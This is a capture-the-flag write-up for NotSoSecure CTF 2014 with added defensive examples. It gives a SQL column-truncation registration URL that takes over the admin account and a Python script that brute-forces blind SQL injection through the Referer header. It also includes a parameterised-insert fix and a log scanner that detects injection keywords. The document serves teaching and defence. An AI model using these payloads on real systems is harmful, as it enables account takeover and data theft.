NotSoSecure CTF 2014 - Writeups
The first flag was about a SQL column truncation vulnerability. After finding the registration page, just request something like this:
http://ctf.notsosecure.com/9128938921839838/register.php?regname=admin%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20x%26regemail%3Dasd@gmail.com%26regpass1%3Dasd123%26regpass2%3Dasd123
to overwrite the admin password, and then just log in with admin:asd123 to get the first flag.
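As an added illustration of why the trick above works (this is example code, not part of the original write-up or the CTF application), the script below models a registration table whose username column is assumed to be 20 characters wide. In the truncating configuration the over-long name is silently cut on INSERT and trailing spaces are ignored on comparison, so the attacker's row collides with the existing admin row and the attacker's password is accepted for "admin". In the strict configuration the name is validated before the INSERT and the column is UNIQUE, so the same registration is rejected. SQLite never truncates, so the truncating behaviour is emulated in Python; the column width, table layout and admin password are constructed for the example.

```python
import sqlite3

# Added example, not code from the original write-up. MAX_LEN is an assumed
# column width; the users table and the admin credentials are constructed.
MAX_LEN = 20


def new_db(unique: bool) -> sqlite3.Connection:
    """In-memory users table, optionally with the UNIQUE constraint a hardened schema has."""
    conn = sqlite3.connect(":memory:")
    constraint = "UNIQUE" if unique else ""
    conn.execute(f"CREATE TABLE users (username TEXT {constraint}, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn


def truncate_like_legacy(name: str) -> str:
    """Emulate a non-strict INSERT into VARCHAR(MAX_LEN): the overflow is silently dropped."""
    return name[:MAX_LEN]


def register_truncating(conn: sqlite3.Connection, username: str, password: str) -> None:
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 (truncate_like_legacy(username), password))


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # RTRIM emulates PAD SPACE collations, under which 'admin' = 'admin   ' is true.
    row = conn.execute(
        "SELECT 1 FROM users WHERE RTRIM(username) = RTRIM(?) AND password = ?",
        (username, password)).fetchone()
    return row is not None


def rejection_reason(name: str):
    """Hardened validation: why the name cannot be stored verbatim, or None if it can."""
    if name != name.strip():
        return "leading/trailing whitespace not allowed"
    if len(name) > MAX_LEN:
        return f"username longer than {MAX_LEN} characters"
    return None


def register_strict(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Validate first, then rely on the UNIQUE constraint; returns the outcome as text."""
    reason = rejection_reason(username)
    if reason:
        return reason
    try:
        conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))
    except sqlite3.IntegrityError:
        return "username already taken"
    return "accepted"


ATTACK_NAME = "admin" + " " * 30 + "x"   # 36 characters, truncates to 'admin' + 15 spaces


def demo_truncation() -> bool:
    """True when the over-long registration lets the attacker log in as admin."""
    conn = new_db(unique=False)
    register_truncating(conn, ATTACK_NAME, "asd123")
    return login(conn, "admin", "asd123")


def demo_strict() -> str:
    """The reason the hardened path rejects the same registration."""
    return register_strict(new_db(unique=True), ATTACK_NAME, "asd123")


if __name__ == "__main__":
    print("truncating column, attacker logs in as admin:", demo_truncation())
    print("strict validation:", demo_strict())
```

On a real MySQL deployment the equivalent of the strict path is running with `sql_mode` set to `STRICT_TRANS_TABLES` or `STRICT_ALL_TABLES` (the INSERT then fails instead of truncating), adding a UNIQUE index on the username column, and validating length and whitespace in the application before the query is ever built.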
The second flag was about blind SQL injection (BSQLi) in the HTTP ‘Referer’ header, but to trigger it you have to URL-encode the payload. The script I used to extract the second flag:
```python
import json
import requests

url = 'http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php'
payload = {'some': 'data'}
# table: flag
# clmn flag
# flag: 1362390
pwd = ""
for j in range(1, 8):          # position within the flag (7 characters)
    for i in range(33, 122):   # printable ASCII candidates for that position
        # Step 1 (commented out): enumerate table names in the current database
        #headers = {'Referer': 'ad%27),((select if((select ascii(substr(table_name,'+str(j)+',1)) from information_schema.tables where table_schema=database() limit 0,1)='+str(i)+',1,2*(select 1 union select 2))),0)%23'}
        # Step 2 (commented out): confirm the column name in table 'flag' (0x666c6167 = 'flag')
        #headers = {'Referer': 'ad%27),((select if((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1)=0x666c6167,1,2*(select 1 union select 2))),0)%23'}
        # Step 3: compare character j of the flag with candidate i; a true comparison
        # yields 1, a false one forces a multi-row subquery error so the insert fails
        headers = {'Referer': 'ad%27),((select if((select ascii(substr(flag,'+str(j)+',1)) from flag limit 0,1)='+str(i)+',1,2*(select 1 union select 2))),0)%23'}
        r = requests.post(url, data=json.dumps(payload), headers=headers)
        if 'touch' in r.text:      # success page came back, so the guess was right
            pwd += chr(i)
            print("OK:" + chr(i))
            break
        else:
            print("Nope:" + str(i))
print(pwd)
```
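The injection above exists because the feedback page writes the Referer header into an INSERT by string concatenation, so the quote and the subselect in the payload are parsed as SQL. As an added defender-side example (not code from the original write-up or the CTF site), the block below does two things: it stores the header with a parameterised INSERT so the same payload lands in the table as plain text, and it scans access-log lines in the common "combined" format, URL-decodes the Referer field and flags values that carry SQL keywords or are not a plain http(s) URL. The feedback table, the log lines and the client addresses are constructed for the example; the second log line reuses the payload from the script above.

```python
import re
import sqlite3
from urllib.parse import unquote, urlparse

# Added example, not code from the original write-up. The table layout,
# the log lines and the IP addresses below are constructed.


def new_feedback_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE feedback (referer TEXT, message TEXT)")
    return conn


def store_feedback(conn: sqlite3.Connection, referer: str, message: str) -> str:
    """Parameterised insert: the header is bound as data, never parsed as SQL.
    Returns the value as it was stored, to show it survived verbatim."""
    conn.execute("INSERT INTO feedback (referer, message) VALUES (?, ?)",
                 (referer, message))
    return conn.execute(
        "SELECT referer FROM feedback ORDER BY rowid DESC LIMIT 1").fetchone()[0]


# Apache/nginx "combined" log format; the Referer is the second quoted field
# after the status and size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Keywords and fragments that have no business in a Referer URL.
SQL_HINT_RE = re.compile(
    r"(?i)\b(select|union|information_schema|substr|ascii)\b|\bif\s*\(|'\)|\)#|--")


def suspicious_referer(raw: str) -> bool:
    """Decode the logged header once and judge it; '-' and empty mean no Referer."""
    value = unquote(raw)
    if value in ("", "-"):
        return False
    if SQL_HINT_RE.search(value):
        return True
    parsed = urlparse(value)
    # Anything that is not an absolute http(s) URL deserves a look.
    return parsed.scheme not in ("http", "https") or not parsed.netloc


def scan_log(lines):
    """Return (client_ip, decoded_referer) for every line with a suspicious Referer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these separately
        if suspicious_referer(m["referer"]):
            hits.append((m["ip"], unquote(m["referer"])))
    return hits


# Constructed sample: one benign POST, one POST carrying the payload from the
# script above, one request without a Referer.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2014:13:55:36 +0000] "POST /f33db4ck_flag/submit.php HTTP/1.1" 200 512 '
    '"http://ctf.notsosecure.com/" "Mozilla/5.0"',
    '203.0.113.9 - - [10/May/2014:13:55:40 +0000] "POST /f33db4ck_flag/submit.php HTTP/1.1" 200 512 '
    '"ad%27),((select if((select ascii(substr(flag,1,1)) from flag limit 0,1)=49,1,2*(select 1 union select 2))),0)%23" '
    '"python-requests/2.2.1"',
    '203.0.113.7 - - [10/May/2014:13:56:01 +0000] "GET /register.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, ref in scan_log(SAMPLE_LOG):
        print(f"suspicious Referer from {ip}: {ref}")
    stored = store_feedback(new_feedback_db(), unquote("ad%27),((select 1))%23"), "hello")
    print("stored verbatim:", stored)
```

The keyword list is a heuristic and will flag legitimate referers whose path happens to contain a word like "select"; it is meant to surface candidates for review, not to replace the parameterised query, which is the actual fix. Note also that the brute-force loop in the script above shows up in the log as many requests from one client with near-identical Referers in a short window, which is a second, keyword-independent signal worth alerting on.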
Razor4x